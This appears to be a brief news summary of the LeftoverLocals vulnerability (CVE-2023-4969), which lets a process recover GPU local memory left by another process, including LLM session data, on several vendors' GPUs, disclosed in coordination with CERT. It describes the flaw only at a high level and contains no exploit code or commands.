LeftoverLocals: Listening to LLM responses through leaked GPU local memory

Researchers Tyler Sorensen and Heidy Khlaaf have discovered a vulnerability, named LeftoverLocals, that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. This vulnerability impacts the security of GPU applications, particularly LLMs and ML models run on impacted GPU platforms. The researchers were able to build a proof of concept where an attacker can listen into another user’s interactive LLM session across process or container boundaries. The vulnerability is tracked by CVE-2023-4969 and the researchers have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors.

The vulnerability allows an attacker who has access to a shared GPU through its programmable interface to steal memory from other users and processes, violating traditional process isolation properties. This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights. The researchers have released a proof of concept that exploits this vulnerability and have tested it across a wide variety of GPU devices, finding that GPUs from AMD, Apple, and Qualcomm are vulnerable to LeftoverLocals.

Key takeaways:

Researchers have discovered a vulnerability named LeftoverLocals that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs.
This vulnerability impacts the security of GPU applications, particularly LLMs and ML models run on impacted GPU platforms.
The researchers were able to build a proof of concept where an attacker can listen into another user’s interactive LLM session across process or container boundaries.
This vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

Key takeaways:

Comments (0)

Newsletter